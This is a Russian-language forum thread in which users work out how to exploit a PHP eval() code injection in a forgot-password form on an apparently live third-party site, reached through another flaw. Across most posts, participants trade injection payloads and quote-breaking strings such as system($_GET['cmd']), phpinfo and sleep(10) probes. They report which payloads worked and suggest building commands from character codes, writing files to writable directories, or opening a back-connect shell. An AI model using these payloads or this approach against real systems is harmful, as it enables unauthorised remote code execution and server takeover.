Старый 01.02.2014, 02:31   #1
hashme
 
Регистрация: 31.01.2014
Сообщений: 15
Репутация: 0
Wink Как найти подход к eval, с чего начать?

Собственно есть такая ошибка

Parse error: syntax error, unexpected '<', expecting ')' ..... eval()'d code on line 1

пробовал локально сэмулировать, чтобы получить именно ее - чтобы примерно понять из чего состоит эвал - не вышло.

возникает при отправке в параметре одинарной кавычки - '

собственно вопрос, есть некая техника с чего начинать расскручивать эвал? стеб бай степ, или какието стандартные приемы инжекта?

те куда копать или что почитать? или шансы что отработает, минимальны?
hashme вне форума   Ответить с цитированием
Старый 01.02.2014, 04:13   #2
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Я так понимаю, речь идет о php?
Попробуйте определить фильтруемые символы, кроме кавычки, и уже от этого ориентироваться. Однако, у вас интерпретатор спотыкается на угловой открывающей скобке. Ничего, в общем-то, не мешает сделать system("cmd"); или system($_GET["cmd"]);
Можно вообще без любых кавычек собрать команду по кодам символов.
madhatter вне форума   Ответить с цитированием
Старый 01.02.2014, 13:07   #3
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

а так?
Цитата:
'#
или
Цитата:
');#

Последний раз редактировалось tex; 01.02.2014 в 13:09..
tex вне форума   Ответить с цитированием
Старый 01.02.2014, 14:38   #4
hashme
 
Регистрация: 31.01.2014
Сообщений: 15
Репутация: 0
По умолчанию

Сорри, что не указал что это пыха.

Также есть подозрение, что используется CodeInteger framework, так как через другую дырку есть табличка ci_sessions или типа того. В целом это пока все что известно.

Касательно формы с одним текст полем (отправка форгот пароля), на которой вылетает сообщение об ошибке eval, есть 3 состояния.

1. УСПЕШНО: форма успешно заполнена и имейл отправлен, проверьте почту и логинтесь.
2. НЕ ВЕРНЫЕ ДАННЫЕ: вы указали не верный имейл, типа он не найден у нас в базе данных. причем этим же ругается, даже на левую строчку, которая не соотвествует имейлу.
3. НЕ ВЕРНЫЕ ДАННЫЕ + EVAL_ERROR: собственно ошибка от евала Parse error: syntax error, unexpected '<', expecting ')' ..... eval()'d code on line 1, которая также выводит EVAL_ERROR

и так.

состояние УСПЕШНО мы получаем если указать следущие варианты:
Код:
'# 
'fsdhofshdfgupshgduofgdf'
состояние НЕ ВЕРНЫЕ ДАННЫЕ
Код:
ffnfffd@fff.com
fhsdofuhsdfsd
phpinfo();
;phpinfo();
;system("whoami");
'' (две одинарные)
);|]*{%0d%0a<%00>%b
"
состояние НЕ ВЕРНЫЕ ДАННЫЕ + EVAL_ERROR
Код:
'
sbobg'gjfdhgd'
'gjfdhgd'Fcsdf
'.'vcv'.'
'.phpinfo().'
');#
Цитата:
Сообщение от tex
...
Скорее всего вы ближе всего к истине с вашим первым вариантом, что еще попробовать на основе его?

Цитата:
Сообщение от madhatter
...
Можно уточнить как именно собрать комманду? Просто system не отрабатывает.

Последний раз редактировалось hashme; 01.02.2014 в 14:43..
hashme вне форума   Ответить с цитированием
Старый 01.02.2014, 14:47   #5
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

Цитата:
sbobg';phpinfo();exit();?>
попробуй, или скинь мне в ЛС урл я покручу сам, заинтересовал)
b3 вне форума   Ответить с цитированием
Старый 01.02.2014, 15:01   #6
hashme
 
Регистрация: 31.01.2014
Сообщений: 15
Репутация: 0
По умолчанию

попробовал

УСПЕШНО
Код:
sbobg';phpinfo();exit();?>
sbobg'?>
НЕ ВЕРНЫЕ ДАННЫЕ + EVAL_ERROR
Код:
sbobg';exit();?>
sbobg';phpinfo();?>
sbobg';phpinfo();exit();#
sbobg';exit();#
sbobg';phpinfo();exit();#
hashme вне форума   Ответить с цитированием
Старый 01.02.2014, 15:07   #7
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

';phpinfo();//
';phpinfo();#
tex вне форума   Ответить с цитированием
Старый 01.02.2014, 15:10   #8
hashme
 
Регистрация: 31.01.2014
Сообщений: 15
Репутация: 0
По умолчанию

НЕ ВЕРНЫЕ ДАННЫЕ + EVAL_ERROR
Код:
';phpinfo();//
';phpinfo();#
hashme вне форума   Ответить с цитированием
Старый 01.02.2014, 15:30   #9
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

Возможно вывод буферизирован, попробуй все выше перечисленные варианты но замени phpinfo() на sleep(10), и еще дополнительный вариант
Цитата:
sbobg');sleep(10);exit();?>
b3 вне форума   Ответить с цитированием
Старый 01.02.2014, 15:40   #10
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Если там фреймворк или двиг какой - попробуй найти исходники. Есть вероятность, что вывод евала глушится. Попробуй, как уже говорили, time-based. Как вариант - создание файла в доступной для записи диры, бекконнект на себя.
madhatter вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot